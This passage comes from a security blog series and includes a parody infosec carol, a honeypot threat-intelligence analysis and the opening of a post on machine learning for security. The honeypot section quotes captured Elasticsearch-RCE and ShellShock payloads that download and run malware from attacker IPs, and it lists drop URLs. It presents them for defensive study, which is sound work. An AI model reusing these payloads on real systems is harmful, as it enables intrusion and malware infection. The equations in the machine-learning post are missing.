way or another, tends to relate to how humans behave). What people do and how much they do it shifts between seasons, between months, even between days of the week. This means that the length of time your data covers can make the difference between a robust answer and an uncertain one – if you've only got Chanukah's worth, we can draw patterns in broad strokes but we can't eliminate the impact seasonal changes might have. The problem with this is that storing a lot of data over a long period of time is hard, potentially expensive and a risk in and of itself – it's not great for user or customer privacy, and in the event of a breach it's another juicy thing the attacker can carry off. As a result, people tend to aggregate their raw data, which is fine if you know the questions you're going to want answering. If you don't, though, the same thing that protects aggregated data from malicious attackers will stymie data scientists: it's very hard, if you're doing it right, to reverse-engineer aggregation, and so researchers are limited to whatever fields or formats you thought were useful at the time, which may not be the ones they actually need. One solution to both problems is to keep data over a long span of time, in its raw format, but sample: keep 1 random row out of 1,000, or 1 out of 10,000, or an even higher ratio. That way data scientists can still work with it and avoid seasonality problems, but it becomes a lot harder for attackers to reconstruct the behavior of individual users. It's still not perfect, but it's a nice middle ground. Make sure data is clean It's the fourth day of Chanukah, you've implemented that nice sampled data store, and you even managed to clean up the sufganiyot the dog pulled off the table and joyously trod into the carpet at its excitement to get human food. You're ready to get to work, you call the data scientists in, and they watch as this elegant sampled datastore collapses into a pile of mud because 3 months ago someone put a tab in a field that shouldn't have a tab and now everything has to be manually reconstructed. If you want data to be reliable, it has to be complete and it has to be clean. By complete we mean that if a particular field only has a meaningful value 1/3rd of the time, for whatever reason, it's going to be difficult to rely on it (particularly in a machine learning context, say). By clean, we mean that there shouldn't be unexpected values, particularly the sort of unexpected value that breaks data formatting or reading. In both cases the answer is data validity checks. Just as engineers have tests – tasks that run every so often to ensure changes haven't unexpectedly broken code – data storage systems and their associated code need validity checks, which run against a new row every so often and make sure that they have all their values, they're properly formatted, and those values are about what they should be. Make sure data is documented It's the last day of Chanukah, you've got a sampled data store with decent data, the dreidel has rolled under the couch and you can't get it out, and you just really really want to take your problem and your data and smush them together into a solution. The data scientists read in the data, nothing breaks this time… and are promptly stumped by columns with names like “Date Of Mandatory Optional Delivery Return (DO NOT DELETE, IMPORTANT)” or simply “f”. You can't expect their bodies to harbour that kind of thing. Every time you build a new data store and get those validity checks set up, you should also be setting up documentation. Where it lives will vary from company to company, but it should exist somewhere and set out what each field means (“the date/time the request was sent”), an example of what sort of value it contains (“2016-12-10 13:42:45”) and any caveats (“The collectors were misconfigured from 2016-12-03 to 2016-12-04, so any timestamps then are one hour off”). That way, data scientists can hit the ground running, rather than spending half their time working out what the data even means. So, as you prepare for Chanukah and 2017, you should be preparing for data science, too. Make sure your data is (respectfully) collected, make sure your data is clean, and make sure your data is documented. Then you can sit back and eat latke in peace.

The Twelve Pains of Infosec

One of my favorite Christmas carols is the 12 Days of Christmas. Back in the 90's, a satire of the song came out in the form of the 12 Pains of Christmas, which had me rolling on the floor in laughter, and still does. Now…

One of my favorite Christmas carols is the 12 Days of Christmas. Back in the 90's, a satire of the song came out in the form of the 12 Pains of Christmas, which had me rolling on the floor in laughter, and still does. Now that I am in information security, I decided it is time for a new satire, maybe this will start a new tradition, and so I am presenting, the 12 Pains of Infosec. The first thing in infosec that's such a pain to me is your password policy The second thing in infosec that's such a pain to me is default credentials, and your password policy The third thing in infosec that's such a pain to me is falling for phishing, default credentials, and your password policy The fourth thing in infosec that's such a pain to me is patch management, falling for phishing, default credentials, and your password policy The fifth thing in infosec that's such a pain to me is Windows XP, patch management, falling for phishing, default credentials, and your password policy The sixth thing in infosec that's such a pain to me is Lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy The seventh thing in infosec that's such a pain to me is no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy The eighth thing in infosec that's such a pain to me is users as local admins, no monitoring, Lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy The ninth thing in infosec that's such a pain to me is lack of management support, users as local admins, no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy The tenth thing in infosec that's such a pain to me is testing for compliance, lack of management support, users as local admins, no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy The eleventh thing in infosec that's such a pain to me is no asset management, testing for compliance, lack of management support, users as local admins, no monitoring, lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy The twelfth thing in infosec that's such a pain to me is trust in antivirus, no asset management, testing for compliance, lack of management support, users as local admins, no monitoring, Lack of input filtering, Windows XP, patch management, falling for phishing, default credentials, and your password policy The first thing in infosec that's such a pain to me is your password policy When I go into organizations for penetration tests, one of the easiest ways to get in is through password guessing. Most organizations use a password policy of 8 characters, complexity turned on, and change every 90 days. So, what do the users do? They come up with a simple to remember password that will never repeat. Yes, I am talking about the infamous Winter16 or variations of season and year. If they aren't using that password, then chances are it is something just as simple. Instead, set a longer password requirement (12 characters or more) and blacklist common words, such as password, seasons, months, and company name. The second thing in infosec that's such a pain to me is default credentials The next most common finding I see is the failure to change default credentials. It is such a simple mistake, but one that can cost your organization a ton! This doesn't just go for web apps like JBOSS and Tomcat, but also for embedded devices. Printers and other embedded devices are a great target since the default credentials aren't usually changed. They often hold credentials to other systems to help gain access or simply can be used as a pivot point to attack other systems. The third thing in infosec that's such a pain to me is falling for phishing Malicious actors go for the weakest link. Often this is the users. Sending a carefully crafted phishing email is almost 100% successful. In fact, even many security professionals fall victim to phishing emails. So, what can we do about it? Well, we must train our employees regularly to spot phishing attempts as well as encourage and reward them for alerting security on phishing attempts. Once reported, add the malicious URL to your blacklist, and redirect to a phishing education page. And for goodness sake, Security Department, please disable the links and remove any tags in the email before forwarding off as "education". The fourth thing in infosec that's such a pain to me is patch management There are so many systems out there. It can be hard to patch them all, but having a good patch management process is essential. Ensuring our systems are up to date with the latest patches will help protect those systems from known attacks. It is not just operating system patches that need to be applied, also for any software you have installed. The fifth thing in infosec that's such a pain to me is Windows XP Oh Windows XP, how I love and hate thee. Even though Windows XP support went the way of the dodo back in 2014, over 2.5 years later I still see it being used in corporate environments. While I called out Windows XP, it is not uncommon to see Windows 2000, Windows Server 2003, and other unsupported operating system software. While some of the issues with these operating systems have been mitigated, such as MS08_067, many places have not applied the patches or taken the mitigation tactics. That is not to mention what unknown security vulnerabilities that exist and will never be patched. Your best bet is to upgrade to a supported operating system. If you cannot for some reason (required software will not run on newer operating systems), segregate the network to prevent access to the unsupported systems. The sixth thing in infosec that's such a pain to me is lack of input filtering We all know and love the OWASP Top 10. Three of the top 10 is included in this pain. Cross-Site Scripting (XSS), SQL Injection (SQLi), HTML Injection, Command Injection, and HTML Redirects are all vulnerabilities that can be solved fully, or at least partially in the case with XSS, with input filtering. Web applications that perform input filtering will remove bad characters, allow only good characters, and perform the input filtering not at the client-side, but at the server-side. Then using output encoding/filtering, XSS is remediated as well. The seventh thing in infosec that's such a pain to me is no monitoring In 1974, Muhammad Ali said “His hands can't hit what his eyes can't see” referring to his upcoming fight with George Foreman. This quote bodes true in Infosec as well. You cannot defend what you cannot see. If you are not performing monitoring in your network, and centralized monitoring so you can collaborate the logs, you will miss attacks. As Dr. Eric Cole says “Prevention is ideal, but detection is critical.” This is also critical to REVIEW the logs, meaning you will need good people that know what they are looking for, not just good monitoring software. The eighth thing in infosec that's such a pain to me is users as local admins Though for years we have been suggesting to segregate user privileges, yet almost every penetration test I perform I find this to be an issue. Limiting use of accounts to only what is needed to do their job is very hard, but essential to secure your environment. This means not giving local administrator privileges to all users but also using separate accounts for managing the domain, limiting the number of privileged accounts, and monitoring the use of these accounts and group memberships. The ninth thing in infosec that's such a pain to me is lack of management support How often do I run into people who want to make a change or changes in their network, yet they do not get the support needed from upper management? A LOT! Sometimes an eye-opening penetration test works wonders. The tenth thing in infosec that's such a pain to me is testing for compliance I get it, certain industries require specific guidelines to show adequate security is in place, but when you test only for compliance sake, you are doing a disservice to your organization. When you attempt to limit the scope of the testing or firewall off the systems during the test, you are pulling a blinder over your eyes, and cannot hope to secure your data. Instead, use the need for testing to meet compliance a way to get more management support and enact real change in the organization. The eleventh thing in infosec that's such a pain to me is no asset management You can't protect what you don't know about. In this regard, employ an asset management system. Know what devices you have and where they are located. Know what software you have, and what patch levels they are at. I can't tell you how many times I have exploited a system and my customer says “What is that? I don't think that is ours”, only to find out that it was their system, they just didn't have good asset management in place. The twelfth thing in infosec that's such a pain to me is trust in antivirus A few years ago, I read that antivirus software was only about 30% effective, leading to headlines about the death of antivirus, yet it still is around. Does that mean it is effective in stopping infections on your computer? No. I am often asked “What is the best antivirus I should get for my computer?” My answer is usually to grab a free antivirus like Microsoft Security Essentials, but be careful where you surf on the internet and what you click on. Antivirus will catch the known threats, so I believe it still has some merit, especially on home computers for relatives who do not know better, but the best protection is being careful. Turn on “click to play” for Flash and Java (if you can't remove Java). Be careful what you click on. Turn on an ad blocker. There is no single “silver bullet” in security that is going to save you. It is a layering of technologies and awareness that will. I hope you enjoyed the song, and who knows, maybe someone will record a video singing it! (not me!) Whatever holiday you celebrate this season, have a great one. Here's to a more secure 2017 so I don't have to write a new song next year. Maybe “I'm dreaming of a secure IoT” would be appropriate.

12 Days of HaXmas: Beginner Threat Intelligence with Honeypots

This post is the 12th in the series, "12 Days of HaXmas." So the Christmas season is here, and between ordering gifts and drinking Glühwein what better way to spend your time than sieve through some honeypot / firewall / IDS logs and try to…

This post is the 12th in the series, "12 Days of HaXmas." So the Christmas season is here, and between ordering gifts and drinking Glühwein what better way to spend your time than sieve through some honeypot / firewall / IDS logs and try to make sense of it, right? At Rapid7 Labs, we're not only scanning the internet, but also looking at who out there is scanning by making use of honeypot and darknet tools. More precisely we're running a couple of honeypots spread around the world and collecting raw traffic PCAP files with something similar to tcpdump (just slightly more clever). This post is just a quick log of me playing around with some of the honeypot logs. Most of what I'm doing here is happening in one of our backend systems as well, but I figured it might be cool to explain this by doing it manually. Some background The honeypot is fairly simple, it waits for incoming connections and then tries to figure out what to do with it. It might need to treat it as a SSL/TLS connection, or just a plain HTTP request. Depending on the incoming protocol, it will try to answer in a meaningful way. Even with some very basic honeypot that just opens a port and waits for requests, you will quickly find things like this: GET /_search?source={"query":+{"filtered":+{"query":+{"match_all":+{}}}},+"script_fields":+{"exp":+{"script":+"import+java.util.*;import+java.io.*;String+str+=+\"\";BufferedReader+br+=+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec(\"wget+-O+/tmp/zldyls+http://61.176.223.109:1111/zldyls\").getInputStream()));StringBuilder+sb+=+new+StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}},+"size":+1} HTTP/1.1 Host: redacted:9200 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.4.1 CPython/2.7.8 Windows/2003Server or this: GET HTTP/1.1 HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* ");' Host: redacted Connection: Close What we're looking at are ElasticSearch (slightly modified as the path was URL decoded for better readability) and ShellShock exploit attempts. One can quickly see that the technique is fairly straightforward - there's a specific exploit that allows you to run commands. In these cases, the attackers are just running some straightforward shell commands in order to download a file (by any means necessary) and execute it. You can find several writeups around these exploitation attempts and the botnets behind it one the web (e.g. [1], [2], [3]). Now because of this common pattern, our honeypot does some basic pattern matching and extracts any URL or command that it finds in the request. If there's a URL (inside a wget/curl/etc command), it will then try to download that file. We could also do this at post-processing stage, but by then the URL might not be available any more as these things tend to disappear or get taken down quickly. Looking at the unique files from the last half year (roughly) we can count following file-types (reduced/combined for readability): 178 ELF 32-bit LSB executable Intel 80386 66 a /usr/bin/perl script ASCII text executable 33 Bourne-Again shell script ASCII text executable 14 POSIX tar archive (GNU) 14 ELF 64-bit LSB executable x86-64 4 ELF 32-bit LSB executable MIPS 2 ELF 32-bit LSB executable ARM 1 ELF 32-bit MSB executable PowerPC or cisco 4500 1 ELF 32-bit MSB executable MIPS 1 OpenSSH DSA public key Typically the attacker is uploading a compiled malware binary. In some cases it's a shell script that will in turn download the next stage. And as we can see there's at least one case of an SSH public key that was uploaded - simple but effective. Also noteworthy is the targetting of quite a few different architectures. These are mostly binaries for embedded routers and for example the QNAP devices that are vulnerable to ShellShock. Getting started on the logs What kind of logs are we looking at? Mostly, our honeypot emits events like "there was a connection" or "i found a URL in a request" and "i downloaded a file from a URL". The first step is to grab a bunch of these events (a few thousand) and apply some geolocation to them (see DAP) (again, modified for better readability): $ cat logs | dap json + geoip sensor + geoip source + remove some + rename some + json { "ref": "conn-d7a38178-0520-49db-a79a-688f5ded5998", "utcts": "2015-12-13T07:36:59.444356Z", "sha1": "3eeb2eb0fdf9e4140277cbe4ce1149e57fae1fc9", "url": "http://ys-k.ys168.com/2.0/475535157/jRSKjUt4H535F3XKNTV/pycn.zuc", "url.netloc": "ys-k.ys168.com", "source": "117.175.110.177", "source.country_code": "CN", "sensor": "redacted", "sensor.country_code": "JP", "dport": 9200, "http.agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)", "http.method": "POST", "vulns": "VULN-ELASTICSEARCH-RCE,CVE-2014-3120,EXEC-SHELLCMD", } ... Now we can take these logs and do some correlatation, creating one record per "attack". We also add a couple more data sources (ASN lookup, filetypes for the downloaded files, etc). For the sake of this post, let's focus on the attacks which lead to downloadable files and that we could categorize as shellshock / elasticsearch exploits. By writing a quick formatting script that does some counting of fields we get something pretty like this (using python prettytable) (full version): +-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | key | count | seen | sensorcountry | dport | httpmethod | vulns | sha1 | url | +-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | 221.224.57.66 | 89 | first: 2015-08-05 | 54x US | 89x 9200 | 89x GET | 89x VULN-ELASTICSEARCH-RCE | 88x 53c458790384b9c33acafaa0c6ddf9bcbf35997e | 84x http://183.56.173.131:999/xiaojiba | | CN | | last: 2015-08-08 | 14x JP | | | CVE-2014-3120 | 1x b6bb2b7cad3790887912b6a8d2203bebedb84427 | 4x http://221.224.57.66:999/xiaojiba | | AS 4134 | | | 10x AU | | | EXEC-SHELLCMD | | 1x http://221.224.57.66:999/qqqq | | | | | 5x IE | | | | | | | | | | 3x SG | | | | | | | | | | 3x BR | | | | | | +-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | 61.147.103.74 | 87 | first: 2015-05-06 | 55x US | 87x 9200 | 87x GET | 87x VULN-ELASTICSEARCH-RCE | 87x f7b229a46b817776d9d2c1052a4ece2cb8970382 | 72x http://61.147.103.74/Aqks | | CN | | last: 2015-05-27 | 15x SG | | | CVE-2014-3120 | | 15x http://61.147.103.74/Aqmds | | AS23650 | | | 11x AU | | | EXEC-SHELLCMD | | | | | | | 4x JP | | | | | | | | | | 2x IE | | | | | | +-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | 117.175.111.10 | 63 | first: 2015-10-26 | 21x IE | 63x 9200 | 63x POST | 63x VULN-ELASTICSEARCH-RCE | 48x 3eeb2eb0fdf9e4140277cbe4ce1149e57fae1fc9 | 18x http://ys-f.ys168.com/2.0/475535129/gUuMfKl6I345M2KKMN3L/hgfd.pzm | | CN | | last: 2015-10-27 | 11x US | | | CVE-2014-3120 | 15x 139033fef5a1dacbd5764e47f1403ebdf6bd854e | 15x http://ys-m.ys168.com/2.0/475535116/j5I614N5344N6HhSvKVs/pua.kfc | | AS 9808 | | | 9x JP | | | EXEC-SHELLCMD | | 15x http://ys-j.ys168.com/2.0/475535140/l5I614M7456NM1hVsIxw/ggg.vip | | | | | 8x AU | | | | | 9x http://ys-d.ys168.com/2.0/475535151/jRtNjKj7K426K6IH6PLK/wsy.sto | | | | | 8x SG | | | | | 5x http://183.60.202.97:12100/mmml | | | | | 6x BR | | | | | 1x http://ys-f.ys168.com/2.0/475535137/iTwHtWk4H537H4685MMK/mmml.bbt | +-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | 189.190.50.56 | 50 | first: 2015-11-05 | 23x US | 50x 80 | 50x GET | 50x VULN-SHELLSHOCK | 37x 21762efb4df7cbb6b2331b34907817499f53be99 | 37x http://189.190.50.56/.b.gif | | MX | | last: 2015-12-02 | 22x AU | | | CVE-2014-6271 | 4x 4172d5b70dfe4f5be3aaeb4b2b78fa230a27b97e | 4x http://189.190.50.56/b.gif | | AS 8151 | | | 5x BR | | | | 4x 3a33f909c486406773b06d8da3b57f530dd80de6 | 4x http://173.220.57.150/scans/ip75.tar | | | | | | | | | 3x ebbe8ebb33e78348a024f8afce04ace6b48cc708 | 3x http://173.220.57.150/scans/dom66.tar | | | | | | | | | 2x 3caf6f7c6f4953b9bbba583dce738481da338ea7 | 2x http://173.220.57.150/scans/php77.tar | +-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ ... With my test dataset of roughly 2000 "attacks with downloads" this leads to 195 unique sources, that make use of several drop URLs and payloads over the course of a couple months. Basic Threat Intelligence Beyond simple correlation by source IP, we can now try to organize this data into some groups - basically trying to correlate several attack sources together based on the payloads and drop sites they use. In addition there are also more in-depth methods like analyzing the malware samples and coming up with specific indicators that allow you to group the binaries together even further. The problem though is that manually doing this grouping is painful, as it's not enough to go one level deep. A source that uses a couple binaries which are also used from another source is the first layer. But then those sources already had their own binaries and URLs, and so on and so forth. Basically it comes down to a simple graph traversal. The individual data points like an attacker ip, a file hash, a drop host ip/name, etc can be viewed as nodes in a graph that have relationships with each other. All connected subgraphs within this graph make up our "groups" / attacker categories. If you create a graph for our honeypot data set, it looks like this: So to categorize our incidents into attacker groups we build up these subgraphs by writing a graph traversal function. We correlate attackers based on binaries used, hosts used for downloading payloads and hosts contacted by the malware samples themselves (sadly didn't get to do this for all of them). GRAPH = collections.defaultdict(set) def add_edge(fr, to): # undirected GRAPH[fr].add(to) GRAPH[to].add(fr) def graph_traversal(src): visited = set([src]) queue = [src,] while queue: parent = queue.pop(0) children = GRAPH[parent] for child in children: if child not in visited: yield parent, child visited.add(child) queue.append(child) for e in DATA: src = ("source", e["source"]) payload = ("payload", e["sha1"]) payloadsrc = ("payloadsrc", e["url.netloc"]) add_edge(src, payload) add_edge(payload, payloadsrc) for i in e.get("mal.tcplist", []): add_edge(payload, ("c2", i)) n = 1 seen = set() for src in set(e["source"] for e in DATA): if src in seen: continue members = set() indicators = set() for (ta, va), (tb, vb) in graph_traversal(("source", src)): if ta == "source": members.add(va) else: indicators.add((ta, va)) if tb == "source": members.add(vb) else: indicators.add((tb, vb)) print json.dumps(dict(members=list(members), indicators=list(indicators), group=n)) n += 1 seen |= members This leads to 81 groups, as shown by the next table (full version): +-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | key | count | seen | source | sourcecountry | srcasn | sensorcountry | dport | httpmethod | vulns | sha1 | url | +-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | 3 | 224 | first: 2015-04-09 | 144x 115.29.174.5 | 210x CN | 144x AS37963 | 84x US | 224x 9200 | 158x POST | 224x VULN-ELASTICSEARCH-RCE | 143x 4db1c73a4a33696da9208cc220f8262fb90767af | 65x http://23.234.25.203:15826/udpg | | | | last: 2015-12-13 | 31x 222.186.21.201 | 14x KR | 66x AS23650 | 44x IE | | 66x GET | CVE-2014-3120 | 81x 2b1f756d1f5b1723df6872d5727bf55f94c7aba9 | 53x http://23.234.25.203:15826/dos | | | | | 14x 14.45.176.29 | | 14x AS 4766 | 26x JP | | | EXEC-SHELLCMD | | 28x http://23.234.25.203:15826/udp | | | | | 14x 61.160.247.231 | | | 26x SG | | | | | 16x http://23.234.25.203:15826/ud | | | | | 8x 222.186.21.195 | | | 23x AU | | | | | 13x http://47.88.21.44:15826/udp | | | | | 7x 222.186.21.166 | | | 21x BR | | | | | 7x http://23.234.25.203:15826/xxoo | | | | | 5x 61.160.223.35 | | | | | | | | 7x http://61.160.223.35:15826/udp | | | | | 1x 222.186.34.70 | | | | | | | | 7x http://23.234.25.203:15826/L88 | | | | | | | | | | | | | 6x http://23.234.25.203:15826/xf23 | | | | | | | | | | | | | 5x http://43.230.147.30:2017/udp | | | | | | | | | | | | | 4x http://61.160.247.231:15826/udp | | | | | | | | | | | | | 4x http://23.234.25.203:15826/udp110 | | | | | | | | | | | | | 3x http://222.186.50.47:15826/udpg | | | | | | | | | | | | | 3x http://222.186.21.201:15826/udp | | | | | | | | | | | | | 3x http://222.186.34.70:2018/udp | +-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | 12 | 23 | first: 2015-11-17 | 9x 206.217.134.130 | 19x US | 9x AS36352 | 18x US | 15x 80 | 15x GET | 15x VULN-SHELLSHOCK | 8x 81b65f4165a6b0689c3e7212ccf938dc55aae1bf | 8x http://192.240.106.106/lga | | | | last: 2015-12-13 | 4x 198.245.72.234 | 2x TR | 4x AS55286 | 3x AU | 8x 9200 | 8x POST | CVE-2014-6271 | 8x c30026c548cd45be89c4fb01aa6df6fd733de964 | 2x http://69.30.200.250/ide.docx | | | | | 4x 69.12.70.34 | 1x CA | 4x AS 8100 | 1x JP | | | 8x VULN-ELASTICSEARCH-RCE | 5x fe01a972a63f754fed0322698e16b2edc933f422 | 2x http://188.138.41.134/dd.exe | | | | | 2x 91.191.170.111 | 1x DE | 2x AS43391 | 1x BR | | | CVE-2014-3120 | 2x 05f32da77a9c70f429c35828d73d68696ca844f2 | 2x http://37.59.8.213/pacs | | | | | 1x 142.54.187.42 | | 1x AS30083 | | | | EXEC-SHELLCMD | | 2x http://69.30.200.250/jof | | | | | 1x 209.126.110.239 | | 1x AS32613 | | | | | | 1x http://69.58.3.226/api | | | | | 1x 174.142.46.120 | | 1x AS24940 | | | | | | 1x http://192.240.106.106/dax.exe | | | | | 1x 136.243.110.172 | | 1x AS33387 | | | | | | 1x http://174.142.46.120/lma1 | | | | | | | | | | | | | 1x http://69.12.70.34/api | | | | | | | | | | | | | 1x http://188.138.41.134/lma1 | | | | | | | | | | | | | 1x http://192.240.106.106/pisd | | | | | | | | | | | | | 1x http://69.30.200.250/jla.cp | +-----+-------+-------------------+----------------------+---------------+---------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+ | 13 | 42 | first: 2015-04-23 | 22x 104.192.0.18 | 22x US | 22x AS27176 | 14x US | 21x 10000 | 42x GET | 42x VULN-QNAP-SHELLSHOCK | 12x 37c5ca684c2f7c9f5a9afd939bc2845c98ef5853 | 20x http://104.192.0.18/apache | | | | last: 2015-04-27 | 20x 37.220.36.77 | 20x NL | 20x AS58073 | 10x IE | 18x 7778 | | | 12x 3e4e34a51b157e5365caa904cbddc619146ae65c | 12x http://104.192.0.18/syn | | | | | | | | 8x SG | 3x 8080 | | | 7x 9d3442cfecf6e850a2d89d2817121e46f796a1b1 | 7x http://104.192.0.18/apache2 | | | | | | | | 7x BR | | | | 7x 9851bcec479204f47a3642177c75a16b58d44c20 | 3x http://104.192.0.18/jawk | | | | | | | | 3x AU | | | | 3x 1a412791a58dca7fc87284e208365d36d19fd864 | | | | | | | | | | | | | 1x d538717c89943f42716c139426c031a21b83c236 | | What else? As mentioned before, this can be done in much more detail, by analyzing the samples further and extracting better/more indicators than the contacted C2 hosts. Also there probably is more data around the hosts / domains used for the drop sites (payload URLs) that could potentially be used to correlate different sets. If we're taking some of the hosts/ips from above and use it to query Project Sonar we'll get dns records, open ports and certificate information: address 104.152.190.2 had port 80/tcp open address 61.147.107.91 was seen in DNS A record for 58559.url.dnspud.com address 222.186.21.115 was seen in DNS A record for cc365cc-com-2015-7.com saw cert 93e5ad9fdf4c9a432a2ebbb6b0e5e0a055051007 on endpoint 216.99.150.113:465 address 89.238.81.138 was seen in DNS A record for www.investorfinder.de address 97.74.204.6 was seen in DNS A record for teafortwohearts.com address 115.238.246.180 had port 80/tcp open address 66.240.252.49 had port 993/tcp open address 208.76.228.65 was seen in DNS A record for peoplesblueprint.ca address 222.141.64.65 had DNS PTR record hn.kd.ny.adsl address 180.97.215.7 was seen in DNS A record for jilijia.net address 203.171.230.109 was seen in DNS A record for cxyt.org elbinvestment.com had a DNS a record with value 89.31.143.1 address 222.186.30.21 was seen in DNS A record for www.lerhe.com saw cert 25907d81d624fd05686111ae73372068488fcc6a on endpoint 178.162.207.107:993 ys-f.ys168.com had a DNS A record pointing to IP 61.147.125.116 address 180.97.215.7 had port 995/tcp open address 213.155.180.226 had port 465/tcp open address 113.10.149.45 was seen in DNS A record for school88le.com ... Following this data / or adding it into the graph can yield some interesting results - but it's also of lower "quality" as most of the infrastructure used by the attackers probably consists of compromised systems and has lots of other use and thus there's a lot of noise around the activity of the attacker. Summing up Looking through these datasets can be fun but also a bit tricky at times. Command-line kungfu and some scripting can help pivot around the dataset if you don't want to put the effort in of using a database and something like SQL queries. Incident data and threat intelligence indicators quite often match the graph data model well and thus we can use of simple graph traversal functions or even a real graph database to analyze our data. In order to analyze most of the samples I implemented Linux support in Cuckoo Sandbox. Available in the current development branch - follow us closely for the release of the next version! Another noteworthy point is that honeypots can still yield some fun (not so much interesting) data nowadays. With internet scanning becoming more popular and easy to do, a few low-skill shotgun-type attackers are joining the game and try to get quick wins by running mass exploitation runs. Rapid7 Labs is always interested in similar stories if you are willing to share them and let us know what you think in the comments! Also feel free to tweet me personally @repmovsb. Happy HaxMas! -Mark References: [1] CARISIRT: Defaulting on Passwords (Part 1): r0_bot | CARI.net Blog [2] Malware Must Die!: MMD-0030-2015 - New ELF malware on Shellshock: the ChinaZ [3] Malware Must Die!: MMD-0032-2015 - The ELF ChinaZ "reloaded"

12 Days of HaXmas: Applying Machine Learning to Security Problems

This post is the eleventh in the series, "12 Days of HaXmas." by Suchin Gururangan, Bob Rudis and the Rapid7 Data Science Team Anomaly detection (i.e. identifying “badness”) and remediation is a hard and expensive process, fraught with false alarms and rabbit…

This post is the eleventh in the series, "12 Days of HaXmas." by Suchin Gururangan, Bob Rudis and the Rapid7 Data Science Team Anomaly detection (i.e. identifying “badness”) and remediation is a hard and expensive process, fraught with false alarms and rabbit holes. The security community is keenly interested in developing and using data-driven tools to filter out noise and automatically detect malicious activity in large networks. While machine-learning offers more flexibility than static, rule-based techniques it is not a silver bullet. In this post, we will cover obstacles in applying machine learning to security and some ways to avoid them. It's All About the Data One core concept in machine learning is that the utility of the algorithms being used are only as strong as the datasets being used. What does this mean when applying machine learning techniques to cybersecurity? This is a bit of an oversimplification, but we generally do one of two things with machine learning: Put a bunch of things together into unlabeled groups (unsupervised learning) Identify new things as being part of already known/labeled groups (classification) Both actions are based on the features associated with each data element. In security, we really want to be able to identify (or classify) a “thing” as good or bad. To do that, the first thing we need is labeled data. At its core, the this classification process is two-fold: first, we train a model on known data and then test it on unknown samples. In particular, adaptable models require a continuous flow of labeled data to train with. Unfortunately, the creation of such labeled data is the most expensive and time-consuming part of the data science process. The data we have is usually messy, incomplete, and inconsistent. While there are many tools to experiment with different algorithms and their parameters, there are few tools to help one develop clean, comprehensive datasets . Often times this means asking practitioners with deep domain expertise to help label existing data elements, which is a very expensive process. You can also try to purchase “good” data but this can be hard to come by in the context of security (and may go stale very quickly). You can also try to use a combination of unsupervised and supervised learning called—unsurprisingly—semi-supervised learning [https://en.wikipedia.org/wiki/Semi-supervised_learning]. _“ The creation of labeled data is the most expensive and time-consuming part of the data science process.” _ Regardless of your approach, it's likely you'll spent a great deal of time, effort and or money in your quest for labeled data. The Need for Unbiased Data Bias in training data can hamper the effectiveness of a model to discern between output classes . In the security context, data bias can be interpreted in two ways. First, attack methodologies are becoming more dynamic than ever before. If a predictive model is trained on known patterns and vulnerabilities (i.e. using features from malware that is file-system resident), it may not necessarily detect an unprecedented attack that does not conform to to those trends (i.e. misses features from malware that is only memory resident). Bias can sneak up on you, as well. You may think you can use the Alexa listings to, say, obtain a list of benign domains, but that assumption may turn out to be a bad idea since there is no guarantee that those sites are clean. Getting good ground truth in security is hard. Data bias also comes in the form of class representation. To understand class representation bias, one can look to a core foundation of statistics: Bayes' theorem. Bayes theorem describes the probability of event A given event B: Expanding the probability P(B) for the set of two mutually exclusive outcomes, we arrive at the following equation: Combining the above equations, we arrive at the following alternative statement of Bayes' theorem: What does this have to do with security? Let's apply this theorem to a concrete problem to show the emergent issues of training predictive models on biased data. Suppose company X has 1,000 employees, and a security vendor has deployed an intrusion detection system (IDS) alerting the company X when it detects a malicious URL sent to an employee's inbox. Suppose there are 10 malicious URLs sent to employees of company X per day. Finally, suppose the IDS analyzes 10,000 incoming URLs to company X per day. We'll use: I to denote an incident (i.e. an incoming malicious URL) ¬I denote a non-incident (i.e. an incoming benign URL) A to denote an alarm (i.e. the IDS classifies incoming URL as malicious), and ¬A to denote a non-alarm (the IDS classifies URL as benign). That means: What's the probability that an alarm is associated with a real incident? Or, how much can we trust the IDS under these conditions? Using Bayes' Theorem from above, we know: We don't have to use the shorthand version, though: Now let's calculate the probability of an incident occurring (and not-occurring)—P(incident) and P(non-incident)—given the parameters of the IDS problem we defined above: These probabilities emphasize the bias present in the distribution of analyzed URLs. The IDS has little sense of what makes up an incident, as it is trained on very few examples of it. Plugging the probabilities into the equation above, 